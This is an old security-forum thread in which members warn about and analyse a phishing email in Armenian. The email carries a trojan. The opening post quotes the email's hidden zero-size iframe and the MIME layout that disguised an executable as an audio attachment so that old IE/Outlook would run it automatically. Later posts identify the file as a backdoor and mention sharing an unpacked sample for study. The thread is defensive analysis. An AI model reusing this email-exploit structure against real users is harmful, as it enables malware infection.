Armenian Knowledge Base  

Go Back   Armenian Knowledge Base > Technical sections > Software > Software Security

LinkBack Thread Tools
Old 22.04.2002, 16:55   #1
¡no pasaran!
dolphin's Avatar
Join Date: 03 2002
Location: localhost
Age: 36
Posts: 540
Downloads: 0
Uploads: 0
Reputation: 13 | 4
Exclamation *** WARNING! ***

Received: from ( [])
	by (8.11.1/8.11.1) with ESMTP id g3LKnF925868
	for <[email protected]>; Mon, 22 Apr 2002 01:49:16 +0500 (GMT)
Received: from  ( []) by
 (Rockliffe SMTPRA 4.5.6) with SMTP id <[email protected]> for <[email protected]>;
 Mon, 22 Apr 2002 01:14:09 +0500
Date: Mon, 22 Apr 2002 01:14:09 +0500
Message-ID: <[email protected]>
From: Web<[email protected]>
To: [email protected]
Subject: nor haykakan projekt
Mime-Version: 1.0
Content-Type: text/html;
X-UIDL: d\p&quot;!Hm%&quot;!mG,!!7GC&quot;!
Status: R 
X-Status: N  -um bacvel e nor sayt hayastani evropayi xorhurd andamakcelu veraberyal.
Bolord mteq yev qvyarkeq i ogut hayastani
<IFRAME height=0 src=&quot;; 
width=0></IFRAME> contains the following: (Attention! If you are running windows and MS IE/Outlook DO NOT try to download and open this file!)

From: &quot;xxxxx&quot;
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

Content-Type: multipart/alternative; 

Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable 

<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>



Content-Type: audio/x-wav;
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

Then follows base64 encoded hh.exe file, that probably will be automaticli executed by some new versions of MS IE and Outlooks...

I'm sure, that it infected with some troyan program and may be dangerous.

Here is extracted hh.exe:

If you have some recently updated antivirus program (AVP recomended) please download this file with care (!!only download, do not open!!)
and check it. Please write down here the results.

(I'm running Linux and cant do it by myself)

Thanks in advance!

[ que fors aus ne le sot riens nee ]
Reply With Quote
Old 22.04.2002, 17:25   #2
z0mbie's Avatar
Join Date: 01 2002
Posts: 777
Downloads: 1
Uploads: 0
Reputation: 0 | 0

AVP & DrWeb (both updated today) nichego ne naxodyat no eto tochno trojan upakovannыy aspack-om

a naschet automatically executed - eto rabotaet tol'ko na redkix starыx versiyax Outlook-a
Reply With Quote
Old 22.04.2002, 19:45   #3
VX's Avatar
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0

Da, eto dowol';no staraya stuka, cherez iframe fuile dowloadit'
Pomnish dolphin, skol'ko vodi uteklo
Reply With Quote
Old 24.04.2002, 00:46   #4
Vazgen Abgaryan's Avatar
Join Date: 10 2001
Location: Yerevan
Posts: 712
Downloads: 6
Uploads: 0
Reputation: 53 | 4

This file contains the new backdoor utility: DTR.14.c
The detection routine will be added with a daily update.

Best regards,
Valentin Kolesnikov,
Kaspersky Labs
Reply With Quote
Old 24.04.2002, 02:50   #5
Join Date: 10 2001
Location: Yerevan
Posts: 55
Downloads: 7
Uploads: 0
Reputation: 8 | 0

i got interested in this progie, and i unpacked it (string references only, no import table(need to run it to dump IT, hehe ) to understand its work better, i uploaded it to my ftp and u can study its work too.
disassemble it with your favourite disasmer and a a lot things will come understandable....
yeah, and dont execute it, hehe ::}
Reply With Quote
Sponsored Links

Thread Tools

На правах рекламы:

All times are GMT. The time now is 02:26.

Powered by vBulletin® Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.